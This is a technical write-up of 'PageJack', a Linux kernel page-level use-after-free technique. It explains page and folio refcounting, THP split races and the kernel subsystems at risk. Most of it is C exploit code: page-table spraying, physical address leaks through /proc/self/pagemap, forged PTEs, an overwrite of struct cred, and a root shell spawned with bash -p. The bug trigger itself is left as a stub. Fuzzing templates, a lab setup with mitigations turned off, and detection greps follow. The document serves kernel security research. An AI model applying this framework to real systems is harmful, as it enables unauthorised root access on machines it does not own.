PageJack is a Linux kernel exploitation technique that abuses a
Page-Level Use-After-Free (UAF): a condition in which a physical page
is freed yet remains mapped into another process's address space,
or remains reachable through another kernel path. Unlike object-level UAF,
which targets specific kernel data structures (for example sk_buff or
file), PageJack operates at memory-page granularity (4KB/2MB/1GB),
yielding a far more powerful primitive.
The core condition arises when the reference count (_refcount)
on a struct page / struct folio reaches zero prematurely
(a refcount-management bug) while the physical page is still mapped through a
Page Table Entry (PTE) belonging to some process. The attacker can then trigger
a reallocation of that page for kernel data, producing
physical aliasing between a userspace mapping and sensitive kernel data.
| Aspect | Object-Level UAF | Page-Level UAF (PageJack) |
|---|---|---|
| Target unit | Kernel object (8B–4KB+) | Physical page (4KB, 2MB, 1GB) |
| Write primitive | Limited to object size | Entire page (4096 bytes) |
| Re-use control | Requires precise heap spray | Page reclaim + kernel alloc |
| Mitigation bypass | SLAB isolation, hardened freelists | Requires bypassing memcg, page_owner |
| Maximum impact | Privilege escalation via cred | Full physical memory R/W (via page table takeover) |
| Kernel 6.x exposure | SLAB randomization raises the bar | folio refcount bugs are still being found |
Since kernel 5.16, Linux has provided struct folio as a "compound page"
abstraction that replaces most direct uses of struct page.
Understanding both is crucial for PageJack.
```c
/* Simplified struct page layout (kernel 6.x) */
struct page {
	unsigned long flags;		/* PG_locked, PG_dirty, PG_uptodate, ... */
	union {
		struct {		/* Page cache / anon pages */
			struct list_head lru;
			struct address_space *mapping;
			pgoff_t index;
			unsigned long private;
		};
		struct {		/* SLAB/SLUB allocator */
			union {
				struct list_head slab_list;
				struct {
					struct page *next;
					int pages;
					int pobjects;
				};
			};
			struct kmem_cache *slab_cache;
			void *freelist;
			union {
				void *s_mem;
				unsigned long counters;
				struct {
					unsigned inuse:16;
					unsigned objects:15;
					unsigned frozen:1;
				};
			};
		};
	};

	/* === CRITICAL FIELD FOR UAF === */
	atomic_t _refcount;	/* Page reference count:
				 *   0 = free to reclaim
				 *  >0 = in use */
	atomic_t _mapcount;	/* -1 = not mapped, ≥0 = mapped N+1 times */
#ifdef CONFIG_MEMCG
	unsigned long memcg_data;
#endif
};
```
```c
/* struct folio - kernel 5.16+ abstraction */
struct folio {
	/* Identical layout to struct page at offset 0 */
	union {
		struct page page;
		struct {
			unsigned long flags;
			atomic_t _refcount;	/* ← TARGET for manipulation */
			atomic_t _mapcount;
			unsigned int _entire_mapcount;
			unsigned int _nr_pages_mapped;
			atomic_t _pincount;
		};
	};
	unsigned long _folio_pad[6];
};
```
The Linux x86-64 kernel uses 5-level page tables (kernel 6.x with LA57). Understanding this structure matters because PageJack ultimately manipulates Page Table Entries (PTEs) to achieve physical memory aliasing.
Physical pages are managed by the Buddy Allocator in zones
(ZONE_DMA, ZONE_NORMAL, ZONE_HIGHMEM).
When a page's _refcount reaches 0, the page is returned to the buddy system
and can be reallocated by any other kernel component.
```c
/* Decrement the refcount and free the page when it hits zero
 * (simplified illustration of the put_page() path) */
static inline void put_page(struct page *page)
{
	struct folio *folio = page_folio(page);

	/*
	 * For hugetlb folios, use folio_put_testzero(), which
	 * drops the reference atomically.
	 */
	if (folio_test_hugetlb(folio))
		return folio_put_hugetlb(folio);

	/* BUG: if _refcount is already 0 before put_page() is called,
	 * this is a double free -> PageJack opportunity */
	if (folio_put_testzero(folio))
		__folio_put(folio);	/* Calls free_unref_page() */
}

/* Fresh allocation from the buddy system (kernel side) */
struct page *alloc_pages(gfp_t gfp_mask, unsigned int order)
{
	return alloc_pages_node(numa_node_id(), gfp_mask, order);
}
```
| Field | Meaning | Modified By | Critical Value |
|---|---|---|---|
| `_refcount` | Total reference count on the page (kernel, VFS, DMA) | `get_page()` / `put_page()` | 0 → freed to buddy |
| `_mapcount` | Number of PTEs mapping this page | `page_add_anon_rmap()` / `page_remove_rmap()` | -1 = not mapped |
| `_pincount` | Pin count (io_uring, RDMA, GUP) | `pin_user_pages()` / `unpin_user_pages()` | 0 = not pinned |
Typical root causes:

- `_refcount` drops to 0 prematurely and the page is freed while a PTE is still active (stale PTE)
- Races between `get_page_unless_zero()` and `put_page()` on parallel paths
- `pin_user_pages()` failing to track the refcount while the page is being split (THP)
- `mremap()` or drivers adding extra PTEs without a corresponding `get_page()`

2MB Transparent Huge Pages (THP) are compound pages with a head page and tail pages. During a split there is a race window in which the refcount can become inconsistent:
```c
/* Pseudocode illustrating the bug pattern in a THP split
 * (not compilable as-is) */
int split_huge_page_to_list(struct page *page, struct list_head *list)
{
	struct folio *folio = page_folio(page);
	struct deferred_split *ds_queue;

	/* [THREAD A] Freeze the refcount for the split */
	if (!folio_ref_freeze(folio, 1))	/* Expects refcount == 1 */
		return -EBUSY;

	/*
	 * vvv RACE WINDOW vvv
	 * [THREAD B] can take a reference via GUP (Direct I/O, io_uring).
	 * THREAD A then continues the split and frees the tail pages,
	 * while THREAD B still holds a refcount on a tail page that
	 * is being freed!
	 */
	__split_huge_page(page, list, end_swap_pfn());

	/*
	 * Tail pages are freed to the buddy allocator with _refcount = 0,
	 * but THREAD B still holds a PTE pointing at those physical pages.
	 */
	for (i = 1; i < nr; i++) {
		struct page *subpage = page + i;

		ClearPageHead(subpage);
		put_page(subpage);	/* <- _refcount hits 0 -> freed to buddy */
	}
	/* ...yet THREAD B's PTE is still valid! */
	return 0;
}
```
- GUP races: `get_user_pages()` holds a refcount while a THP split frees the
tail pages. The window is small but can be triggered via io_uring or RDMA.
- `mremap()` variants that move PTEs without performing a corresponding `get_page()`,
allowing the page to be freed by one side while the new PTE is still active.
- `mseal()` (kernel 6.10+) and other memory operations
that can leave VMA and page-refcount state inconsistent.
| Subsystem | Interface | Risk | Kernel Version |
|---|---|---|---|
| io_uring | IORING_OP_FIXED_FILE, zero-copy recv | 🔴 High | 5.1+ |
| THP / Huge Pages | madvise(MADV_HUGEPAGE) | 🟡 Medium | 2.6.38+ |
| FUSE passthrough | FUSE_PASSTHROUGH | 🔴 High | 6.9+ |
| userfaultfd | UFFDIO_COPY, UFFDIO_MOVE | 🟡 Medium | 4.3+ |
| ksmbd (SMB3) | SMB2 compound requests | 🔴 High | 5.15+ |
| DMA-BUF | dma_buf_export() | 🟡 Medium | 3.3+ |
| KVM / Nested VMM | EPT/NPT page fault handling | 🔴 High | All |
The core of PageJack is creating a condition in which one physical page is referenced by two different entities simultaneously: a stale userspace PTE on one side and a fresh kernel allocation on the other.
After the page has been freed prematurely, the attacker needs to control what reallocates it. The most powerful target is to get the page reused as a Page Table Page (PTP): a page that holds kernel PTEs.
```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <linux/userfaultfd.h>
#include <fcntl.h>
#include <pthread.h>

/* ─────────────────────────────────────────────────
   PAGE TABLE SPRAYING
   Goal: force the kernel to allocate many page table pages
   so that the page freed (via the bug) is reused as a PTP.
   ───────────────────────────────────────────────── */

#define PT_SPRAY_SIZE  0x10000   /* 64KB per mmap region */
#define PT_SPRAY_COUNT 512       /* Number of spray regions */
#define PAGE_SIZE      0x1000

struct spray_ctx {
    void *addrs[PT_SPRAY_COUNT];
    int count;
    int phase;    /* 0 = spray, 1 = selectively free */
};

/*
 * pt_spray_alloc():
 * Allocate many mmap regions, then touch each of their pages.
 * This forces the kernel to allocate PTE pages: one PTE page per
 * 2MB of mapped virtual range (512 entries x 4KB).
 */
int pt_spray_alloc(struct spray_ctx *ctx)
{
    for (int i = 0; i < PT_SPRAY_COUNT; i++) {
        ctx->addrs[i] = mmap(NULL, PT_SPRAY_SIZE, PROT_READ|PROT_WRITE,
                             MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
        if (ctx->addrs[i] == MAP_FAILED) {
            perror("mmap spray");
            return -1;
        }
        /* Touch each page -> page fault -> kernel allocates PTEs */
        for (size_t off = 0; off < PT_SPRAY_SIZE; off += PAGE_SIZE) {
            volatile char *p = (char *)ctx->addrs[i] + off;
            *p = 0x41;    /* Trigger demand paging */
        }
        ctx->count++;
    }
    printf("[*] Sprayed %d PTE regions\n", ctx->count);
    return 0;
}

/*
 * pt_spray_free_holes():
 * Free the even-numbered regions to create "holes" into which the
 * physical page freed via the bug can land.
 */
void pt_spray_free_holes(struct spray_ctx *ctx)
{
    for (int i = 0; i < ctx->count; i += 2) {
        munmap(ctx->addrs[i], PT_SPRAY_SIZE);
        ctx->addrs[i] = NULL;
    }
    printf("[*] Freed %d holes for re-use targeting\n", ctx->count / 2);
}
```
If the freed page is reused as a Page Table Page, an attacker who still holds a stale PTE to it can now read and write the contents of that page table itself. This yields an extremely powerful arbitrary PTE write primitive.
An information leak (for example via /proc/self/maps, or another info-leak bug)
is required to compute the offset of the target PTE.
One of the biggest challenges is learning the physical address of the freed page. Several techniques exist:
- `/proc/self/pagemap`: converts a virtual address to a physical frame number (PFN). Requires privilege, or a kernel below 4.0, for full access.
- `page_to_virt()` offset.

```c
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>

#define PAGE_SIZE 0x1000UL
#define PFN_MASK  0x7FFFFFFFFFFFFULL   /* bits 0-54 = PFN */
#define PRESENT   (1ULL << 63)         /* bit 63 = present */

/*
 * virt_to_phys():
 * Convert a virtual address to a physical address using /proc/self/pagemap.
 * NOTE: kernels >= 4.0 require CAP_SYS_ADMIN to read the PFN.
 * On older kernels, or with suitable privileges, this works unprivileged.
 */
uint64_t virt_to_phys(uintptr_t vaddr)
{
    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0) {
        perror("pagemap");
        return 0;
    }

    uint64_t entry = 0;
    off_t offset = (vaddr / PAGE_SIZE) * sizeof(uint64_t);
    if (pread(fd, &entry, sizeof(entry), offset) != sizeof(entry)) {
        perror("pread pagemap");
        close(fd);
        return 0;
    }
    close(fd);

    if (!(entry & PRESENT)) {
        fprintf(stderr, "Page not present in memory!\n");
        return 0;
    }

    uint64_t pfn   = entry & PFN_MASK;
    uint64_t paddr = (pfn * PAGE_SIZE) | (vaddr & (PAGE_SIZE - 1));
    printf("[*] virt=0x%lx → phys=0x%lx (PFN=%lu)\n", vaddr, paddr, pfn);
    return paddr;
}

int main(void)
{
    /* Allocate a page and lock it so it cannot be swapped out */
    void *buf = mmap(NULL, PAGE_SIZE, PROT_READ|PROT_WRITE,
                     MAP_PRIVATE|MAP_ANONYMOUS|MAP_LOCKED, -1, 0);
    *(volatile char *)buf = 0x41;   /* touch to populate the PTE */

    uint64_t phys = virt_to_phys((uintptr_t)buf);
    printf("Physical address: 0x%lx\n", phys);
    return 0;
}
```
```c
/*
 * After triggering the bug (page freed), spray page tables and check
 * whether our stale mapping now contains data that looks like PTEs.
 *
 * A valid PTE has these characteristics:
 *  - bit 0 (Present) = 1
 *  - bit 1 (R/W) may be set
 *  - bits 12-51: a valid Physical Frame Number
 *  - does not contain a user-controlled pattern
 */
#define PTE_PRESENT  (1ULL << 0)
#define PTE_RW       (1ULL << 1)
#define PTE_USER     (1ULL << 2)
#define PTE_NX       (1ULL << 63)
#define PTE_PFN_MASK 0x000FFFFFFFFFF000ULL

static inline int looks_like_pte(uint64_t val)
{
    /* Present, non-zero, PFN within a plausible range */
    if (!(val & PTE_PRESENT))
        return 0;
    uint64_t pfn = (val & PTE_PFN_MASK) >> 12;
    if (pfn == 0 || pfn > 0xFFFFFF)
        return 0;    /* Implausible PFN */
    return 1;
}

/*
 * scan_stale_mapping():
 * Scan the 4KB page reachable via the stale mapping and check whether
 * its contents look like a page table (512 x 8-byte PTE entries).
 */
int scan_stale_mapping(uint64_t *stale_page)
{
    int pte_count = 0;
    for (int i = 0; i < 512; i++) {
        if (looks_like_pte(stale_page[i])) {
            pte_count++;
            printf("  [PTE %d] 0x%016lx → PFN=0x%lx flags=0x%lx\n",
                   i, stale_page[i],
                   (stale_page[i] & PTE_PFN_MASK) >> 12,
                   stale_page[i] & 0xFFF);
        }
    }
    printf("[*] Found %d/512 valid-looking PTEs in stale mapping\n", pte_count);
    /* Threshold: if >100 entries look like PTEs → this is a page table! */
    return (pte_count > 100);
}
```
```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <pthread.h>
#include <errno.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <sched.h>

/* ════════════════════════════════════════════════
   PAGEJACK EXPLOIT FRAMEWORK
   Linux Kernel 6.x Page-Level UAF Exploitation
   ════════════════════════════════════════════════ */

/* ─── Configuration ─── */
#define PAGE_SIZE    0x1000UL
#define SPRAY_MAPS   512                /* Number of spray mappings */
#define SPRAY_SIZE   (64 * PAGE_SIZE)
#define MAX_VULN_FDS 16

/* ─── PTE flags (x86-64) ─── */
#define PTE_P  (1ULL << 0)    /* Present */
#define PTE_RW (1ULL << 1)    /* Read/Write */
#define PTE_US (1ULL << 2)    /* User accessible */
#define PTE_D  (1ULL << 6)    /* Dirty */
#define PTE_NX (1ULL << 63)   /* No-Execute */
#define PTE_PFN(pfn) ((pfn) << 12)
#define PTE_VALID_FLAGS (PTE_P | PTE_RW | PTE_D | PTE_NX)

/* Forward declaration (helper defined below) */
uint64_t virt_to_phys_internal(uintptr_t vaddr);

/* ─── Global state ─── */
static struct {
    void     *spray_maps[SPRAY_MAPS];
    uint64_t  target_pfn;   /* PFN of freed page (our stale mapping) */
    void     *stale_virt;   /* Userspace VA still mapping target_pfn */
    void     *rw_mapping;   /* R/W window after PT hijack */
    int       spray_count;
    int       pt_hijack_ok;
} g;

/* ════════════════════════════════════════════════
   PHASE 1: INFO LEAK / KASLR BYPASS
   ════════════════════════════════════════════════ */

uint64_t leak_kernel_base(void)
{
    /*
     * Placeholder: in a real exploit, leverage an info leak bug.
     * Examples:
     *  - Read from /proc/kallsyms (needs root or debug config)
     *  - Exploit a kernel pointer leak (e.g., uninitialized heap)
     *  - Side-channel (cache timing, speculation)
     *  - Read from /sys/ or /proc/ before kernel 6.x hardening
     *
     * For testing: compile the kernel with KASLR disabled (nokaslr).
     */
    FILE *f = fopen("/proc/kallsyms", "r");
    if (!f)
        return 0;
    uint64_t addr;
    char type, sym[256];
    while (fscanf(f, "%lx %c %255s", &addr, &type, sym) == 3) {
        if (strcmp(sym, "_text") == 0) {
            fclose(f);
            printf("[+] Kernel base (_text): 0x%lx\n", addr);
            return addr;
        }
    }
    fclose(f);
    return 0;
}

/* ════════════════════════════════════════════════
   PHASE 2: TRIGGER BUG (STUB - VULNERABILITY SPECIFIC)
   ════════════════════════════════════════════════ */

typedef struct {
    void     *virt_addr;   /* Virtual address of the UAF'd page */
    uint64_t  phys_addr;   /* Physical address (obtained before free) */
    uint64_t  pfn;         /* Page Frame Number */
} uaf_page_t;

/*
 * trigger_page_uaf():
 * STUB - fill in with exploit code for a specific CVE.
 *
 * Example vulnerabilities that could slot in here:
 *  - CVE-2023-XXXX: THP split race via io_uring + userfaultfd
 *  - CVE-2024-XXXX: mremap double-mapping bug
 *  - CVE-202X-XXXX: driver DMA-BUF refcount underflow
 *
 * Output: `out` must be filled with info about the UAF'd page.
 */
int trigger_page_uaf(uaf_page_t *out)
{
    printf("[*] Triggering page-level UAF...\n");

    /* ── STUB: replace with a real trigger ── */
    /*
     * Typical pattern:
     *  1. Allocate the target page via mmap()
     *  2. Obtain its physical address via /proc/self/pagemap
     *  3. Pin the page via io_uring / pin_user_pages (for get_page)
     *  4. Trigger the split/free bug that drops _refcount to 0
     *     even though our PTE is still active
     *  5. Verify the page has been freed (e.g., via buddy allocator
     *     timing or /proc/buddyinfo)
     */

    /* Simulation: alloc + get physical address */
    void *target = mmap(NULL, PAGE_SIZE, PROT_READ|PROT_WRITE,
                        MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
    if (target == MAP_FAILED) {
        perror("target mmap");
        return -1;
    }
    *(volatile char *)target = 0xAA;   /* Page fault -> allocate physical page */

    out->virt_addr = target;
    out->phys_addr = virt_to_phys_internal((uintptr_t)target);
    out->pfn       = out->phys_addr >> 12;
    printf("[+] Target page: virt=%p phys=0x%lx PFN=%lu\n",
           target, out->phys_addr, out->pfn);

    /* TODO: insert the actual UAF trigger here (CVE-specific) */
    /* After the trigger: the page should be freed by the kernel while
       the `target` virtual address still has a valid PTE */

    g.stale_virt = target;
    g.target_pfn = out->pfn;
    return 0;
}

/* ════════════════════════════════════════════════
   PHASE 3: PAGE TABLE SPRAY & RE-USE
   ════════════════════════════════════════════════ */

int spray_page_tables(void)
{
    printf("[*] Spraying page table pages...\n");
    g.spray_count = 0;
    for (int i = 0; i < SPRAY_MAPS; i++) {
        g.spray_maps[i] = mmap(NULL, SPRAY_SIZE, PROT_READ|PROT_WRITE,
                               MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
        if (g.spray_maps[i] == MAP_FAILED)
            continue;
        /* Touch every page to force kernel PTE allocation */
        volatile char *p = g.spray_maps[i];
        for (size_t off = 0; off < SPRAY_SIZE; off += PAGE_SIZE)
            p[off] = (char)i;
        g.spray_count++;
    }
    printf("[+] Sprayed %d page table regions (%d pages each)\n",
           g.spray_count, (int)(SPRAY_SIZE / PAGE_SIZE));
    return 0;
}

int check_pt_hijack(void)
{
    printf("[*] Checking if stale mapping now contains PTEs...\n");
    uint64_t *page = (uint64_t *)g.stale_virt;
    int pte_like = 0;
    for (int i = 0; i < 512; i++) {
        uint64_t v = page[i];
        /* Heuristic: valid PTE = present + plausible PFN */
        if ((v & PTE_P) && ((v >> 12) & 0xFFFFFF) != 0)
            pte_like++;
    }
    printf("[*] PTE-like entries in stale page: %d/512\n", pte_like);
    g.pt_hijack_ok = (pte_like > 50);
    return g.pt_hijack_ok;
}

/* ════════════════════════════════════════════════
   PHASE 4: EXPLOIT - PTE MANIPULATION
   ════════════════════════════════════════════════ */

/*
 * craft_evil_pte():
 * Build a PTE entry pointing at a target physical page.
 * Used to open an R/W window into kernel memory.
 *
 * target_pfn: PFN of the kernel page we want to access
 *             (e.g., the page holding struct cred)
 */
uint64_t craft_evil_pte(uint64_t target_pfn)
{
    /* Present + RW + user-accessible (no NX: writable data) */
    return PTE_PFN(target_pfn) | PTE_P | PTE_RW | PTE_US | PTE_D;
}

/*
 * find_and_modify_pte():
 * Scan the stale page (now a PT page) for the PTE pointing at the
 * target physical page, then modify it for exploitation.
 */
int find_and_modify_pte(uint64_t target_phys, uint64_t evil_phys)
{
    uint64_t *pt_page   = (uint64_t *)g.stale_virt;
    uint64_t target_pfn = target_phys >> 12;
    uint64_t evil_pfn   = evil_phys >> 12;

    printf("[*] Scanning for PTE pointing to PFN 0x%lx...\n", target_pfn);
    for (int i = 0; i < 512; i++) {
        uint64_t pte     = pt_page[i];
        uint64_t pte_pfn = (pte & 0x000FFFFFFFFFF000ULL) >> 12;

        if (pte_pfn == target_pfn && (pte & PTE_P)) {
            printf("[+] Found target PTE at index %d: 0x%016lx\n", i, pte);
            printf("[*] Overwriting PTE → PFN 0x%lx (evil target)\n", evil_pfn);
            /*
             * === CRITICAL: PTE OVERWRITE ===
             * Write the evil PTE through the stale mapping. This
             * effectively changes what is mapped by the virtual
             * address that previously pointed at target_phys.
             */
            pt_page[i] = craft_evil_pte(evil_pfn);

            /* Flush the TLB via mprotect (poor man's INVLPG) */
            mprotect(g.stale_virt, PAGE_SIZE, PROT_READ|PROT_WRITE);
            return i;   /* Return the index for reference */
        }
    }
    fprintf(stderr, "[-] Target PTE not found in hijacked PT page\n");
    return -1;
}

/* ════════════════════════════════════════════════
   PHASE 5: PRIVILEGE ESCALATION via cred overwrite
   ════════════════════════════════════════════════ */

/*
 * struct cred layout (simplified, kernel 6.x)
 * Reached from task_struct:
 *   task_struct → real_cred / cred → struct cred
 *
 * struct cred {
 *     atomic_t usage;   // +0x00
 *     uid_t    uid;     // +0x04
 *     gid_t    gid;     // +0x08
 *     uid_t    suid;    // +0x0C
 *     ...
 *     uid_t    euid;    // +0x14
 *     ...
 * };
 */
void overwrite_cred(void *cred_window)
{
    /* cred_window is a userspace pointer to the mapped kernel cred page */
    uint32_t *cred = (uint32_t *)cred_window;

    printf("[*] Overwriting struct cred...\n");
    printf("    Current uid: %u euid: %u\n", getuid(), geteuid());

    /* Zero out uid/gid/suid/sgid/euid/egid/fsuid/fsgid.
       Typical offsets (verify against your kernel version!): */
    cred[1] = 0;   /* uid */
    cred[2] = 0;   /* gid */
    cred[3] = 0;   /* suid */
    cred[4] = 0;   /* sgid */
    cred[5] = 0;   /* euid */
    cred[6] = 0;   /* egid */
    cred[7] = 0;   /* fsuid */
    cred[8] = 0;   /* fsgid */

    printf("[+] Cred overwritten. New uid: %u euid: %u\n",
           getuid(), geteuid());
}

void spawn_root_shell(void)
{
    if (getuid() == 0) {
        printf("\n[!] ROOT OBTAINED! Spawning shell...\n");
        execl("/bin/bash", "bash", "-p", NULL);
    } else {
        fprintf(stderr, "[-] Not root (uid=%u)\n", getuid());
    }
}

/* ════════════════════════════════════════════════
   INTERNAL HELPER: virt → phys
   ════════════════════════════════════════════════ */

uint64_t virt_to_phys_internal(uintptr_t vaddr)
{
    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0)
        return 0;
    uint64_t e = 0;
    pread(fd, &e, 8, (vaddr / PAGE_SIZE) * 8);
    close(fd);
    if (!(e >> 63))
        return 0;
    return ((e & 0x7FFFFFFFFFFFFULL) * PAGE_SIZE) | (vaddr & (PAGE_SIZE - 1));
}

/* ════════════════════════════════════════════════
   MAIN
   ════════════════════════════════════════════════ */

int main(int argc, char **argv)
{
    printf("\n"
           "╔══════════════════════════════════════╗\n"
           "║   PageJack: Linux Kernel Page-UAF    ║\n"
           "║       Research Framework v1.0        ║\n"
           "╚══════════════════════════════════════╝\n\n");
    printf("[*] Running as uid=%u pid=%d\n", getuid(), getpid());

    /* ── Phase 1: Info leak ── */
    uint64_t kbase = leak_kernel_base();
    if (!kbase)
        fprintf(stderr, "[-] Failed to leak kernel base (non-fatal, proceeding)\n");

    /* ── Phase 2: Trigger UAF ── */
    uaf_page_t uaf = {0};
    if (trigger_page_uaf(&uaf) < 0) {
        fprintf(stderr, "[-] UAF trigger failed\n");
        return 1;
    }
    printf("[+] UAF page: virt=%p phys=0x%lx PFN=%lu\n",
           uaf.virt_addr, uaf.phys_addr, uaf.pfn);

    /* ── Phase 3: Spray page tables ── */
    spray_page_tables();

    /* ── Check PT hijack ── */
    if (!check_pt_hijack()) {
        fprintf(stderr, "[-] Page table hijack not confirmed. Retry or adjust spray.\n");
        return 1;
    }
    printf("[+] Page table hijack CONFIRMED!\n");

    /* ── Phase 4: Find the cred page and map it ──
     * In a real exploit:
     *  1. Leak the address of current->cred via a kernel pointer leak
     *  2. Compute the physical address of the cred page
     *  3. Modify a PTE in the hijacked PT to map the cred page to userspace
     *  4. Overwrite the uid/gid fields
     *
     * Here we only demonstrate the structure:
     */
    printf("[*] TODO: locate struct cred physical address via leak\n");
    printf("[*] TODO: modify PTE via hijacked page table\n");
    printf("[*] TODO: overwrite uid/gid in mapped cred page\n");

    /* ── Phase 5: Spawn root shell ── */
    spawn_root_shell();

    printf("[*] Exploit complete. Cleaning up.\n");
    return 0;
}
```
For hunting new page-level UAFs with syzkaller, here is a syzlang template targeting operations prone to refcount races:
```
# Syzlang description: fuzz page refcount paths
# Target: page lifecycle bugs, THP split races, GUP UAF
# Usage: include in the syzkaller config under "enable_syscalls"

resource fd_uffd[fd]

# userfaultfd(2) - powerful primitive for race triggering
userfaultfd(flags flags[uffd_flags]) fd_uffd
ioctl$UFFDIO_API(fd fd_uffd, cmd const[UFFDIO_API], arg ptr[in, uffdio_api])
ioctl$UFFDIO_REGISTER(fd fd_uffd, cmd const[UFFDIO_REGISTER], arg ptr[in, uffdio_register])
ioctl$UFFDIO_COPY(fd fd_uffd, cmd const[UFFDIO_COPY], arg ptr[inout, uffdio_copy])
ioctl$UFFDIO_MOVE(fd fd_uffd, cmd const[UFFDIO_MOVE], arg ptr[inout, uffdio_move])

# madvise - trigger THP split, MADV_DONTNEED, MADV_FREE
madvise(addr vma, length len[addr], advice flags[madvise_flags])

# mremap - historical source of page refcount bugs
mremap(old_addr vma, old_size len[old_addr], new_size int32, flags flags[mremap_flags], new_addr vma)

# mmap with MAP_FIXED - useful for controlled aliasing
mmap$anon_fixed(addr vma, length len[addr], prot flags[mmap_prot], flags const[MAP_PRIVATE_ANON_FIXED], fd const[-1], offset const[0])

# process_madvise - cross-process memory ops (Linux 5.10+)
process_madvise(pidfd fd_pidfd, vec ptr[in, array[iovec]], vlen len[vec], advice flags[madvise_flags], flags const[0])

uffd_flags = O_CLOEXEC, O_NONBLOCK, UFFD_USER_MODE_ONLY
madvise_flags = MADV_HUGEPAGE, MADV_NOHUGEPAGE, MADV_DONTNEED, MADV_FREE, MADV_COLD, MADV_PAGEOUT, MADV_SPLIT
mremap_flags = MREMAP_MAYMOVE, MREMAP_FIXED, MREMAP_DONTUNMAP
mmap_prot = PROT_READ, PROT_WRITE, PROT_READ_WRITE

define MAP_PRIVATE_ANON_FIXED (MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED)
```
```bash
#!/bin/bash
# QEMU environment for testing PageJack exploits.
# Kernel compiled with debugging flags for research.

KERNEL="./bzImage"
ROOTFS="./rootfs.img"
PORT=2222

qemu-system-x86_64 \
    -kernel "$KERNEL" \
    -drive file="$ROOTFS",format=raw \
    -append "root=/dev/sda console=ttyS0 \
             nokaslr \
             nosmap nosmep \
             pti=off \
             mitigations=off \
             slub_debug=FZPU \
             page_alloc.shuffle=0 \
             transparent_hugepage=always \
             init=/sbin/init" \
    -nographic \
    -m 4G \
    -smp 4 \
    -enable-kvm \
    -cpu host,+smep,-smap \
    -netdev user,id=net0,hostfwd=tcp::${PORT}-:22 \
    -device virtio-net-pci,netdev=net0 \
    -device virtio-balloon \
    -snapshot

# Kernel config flags for the research build:
# CONFIG_KASAN=y               # AddressSanitizer
# CONFIG_KASAN_INLINE=y
# CONFIG_PAGE_OWNER=y          # Track page ownership
# CONFIG_DEBUG_PAGEALLOC=y     # Poison freed pages (caution: very slow)
# CONFIG_SLUB_DEBUG=y
# CONFIG_DEBUG_VM=y
# CONFIG_TRANSPARENT_HUGEPAGE=y
# CONFIG_USERFAULTFD=y
# CONFIG_DEBUG_LIST=y
# CONFIG_LOCKDEP=y
```
```bash
#!/bin/bash
# Build a Linux kernel with debugging enabled for PageJack research.

KERNEL_VER="6.8"
JOBS=$(nproc)

cd linux-$KERNEL_VER

# Minimal config with debugging
make x86_64_defconfig
./scripts/config \
    -e KASAN \
    -e KASAN_INLINE \
    -e PAGE_OWNER \
    -e SLUB_DEBUG \
    -e DEBUG_VM \
    -e DEBUG_PAGEALLOC \
    -e TRANSPARENT_HUGEPAGE \
    -e TRANSPARENT_HUGEPAGE_ALWAYS \
    -e USERFAULTFD \
    -e IO_URING \
    -e FUSE_FS \
    -e DEBUG_LIST \
    -e PROVE_LOCKING \
    -d RANDOMIZE_BASE \
    -d SMAP \
    -d SMEP
make olddefconfig

make -j$JOBS bzImage 2>&1 | tee build.log
echo "[+] Build done. Check build.log for errors."
```
| Mitigation | Mechanism | Kernel Version | Effectiveness vs PageJack |
|---|---|---|---|
| KPTI (PTI) | Separate kernel/user page tables; kernel PTs not visible from userspace | 4.15+ | 🟡 Partial — user-accessible PTEs remain |
| CONFIG_DEBUG_PAGEALLOC | Poison freed pages with a known pattern; trap accesses to freed pages | All | 🟢 Effective for detection, but disabled in production |
| page_owner tracking | Track page allocations to detect double-frees and UAFs | 4.5+ | 🟢 Detection only, not preventive |
| KASAN (Kernel ASan) | Instrument memory accesses; detect UAF and OOB | 4.0+ | 🟡 Detects object-level issues, less effective at page level |
| folio refcount checks | Verify the refcount before page operations | 5.16+ | 🟡 Gaps remain depending on the path taken |
| mseal() (Linux 6.10) | Seal VMAs so they cannot be unmapped/remapped | 6.10+ | 🟡 Complicates some attack paths |
| GUP pin vs get | Distinct FOLL_PIN vs FOLL_GET refcount semantics | 5.6+ | 🟢 Closes most GUP UAF paths |
```bash
# dmesg symptoms that indicate a page-level UAF

# 1. BUG: Bad page state
dmesg | grep -E "Bad page state|bad_page"

# 2. BUG: Bad page map (stale PTE detected)
dmesg | grep -E "Bad page map|bad_pte"

# 3. WARNINGs in mm/rmap.c (unmapping an already-freed page)
dmesg | grep -E "page_remove_rmap|warn_free_bad|unlink_anon_vmas"

# 4. KASAN report for a use-after-free in page allocation
dmesg | grep -A20 "KASAN: use-after-free"

# 5. Refcount underflow
dmesg | grep -E "refcount_t: underflow|page ref count"

# Monitor in real time:
watch -n1 'dmesg | tail -30 | grep -E "BUG|WARNING|KASAN|bad page"'
```
Relevant kernel source files:

- `mm/page_alloc.c` — buddy allocator, `__alloc_pages()`, `free_unref_page()`
- `mm/rmap.c` — reverse mapping, `page_add_anon_rmap()`, `page_remove_rmap()`
- `mm/huge_memory.c` — THP split, `split_huge_page_to_list()`
- `mm/gup.c` — Get User Pages, `pin_user_pages()`, `get_user_pages_fast()`
- `include/linux/mm_types.h` — `struct page`, `struct folio`
- `arch/x86/mm/fault.c` — page fault handler, PTE operations
- `mm/userfaultfd.c` — userfaultfd implementation
- `bad page state` or refcount anomalies
- `/proc/self/pagemap`